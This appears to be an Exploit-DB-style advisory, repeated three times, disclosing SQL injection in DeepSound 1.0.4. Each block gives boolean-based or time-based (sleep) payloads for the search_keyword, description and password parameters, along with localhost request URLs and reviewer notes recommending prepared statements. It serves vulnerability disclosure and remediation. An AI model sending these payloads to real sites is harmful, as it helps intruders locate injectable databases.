===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Injection
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : search_keyword
# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
# POST Method : http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL Inject Here]
# Reviewer note: this is a boolean-based test, and the pattern implies search_keyword reaches the SQL string unescaped; the fix is to bind it as a prepared-statement parameter.
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Injection
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : description
# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
# POST Method : http://localhost/Script/admin?id=&description=[TEXT INPUT]2350265[SQL Inject Here]
# Reviewer note: this is a time-based test (sleep(3)) against the description parameter of the admin endpoint; the fix is to bind description as a prepared-statement parameter.
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Injection
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
# POST Method : http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL Inject Here]
# Reviewer note: this is a boolean-based test on the password parameter; the fix is to bind password as a prepared-statement parameter rather than placing it in the SQL string.
===========================================================================================
###########################################################################################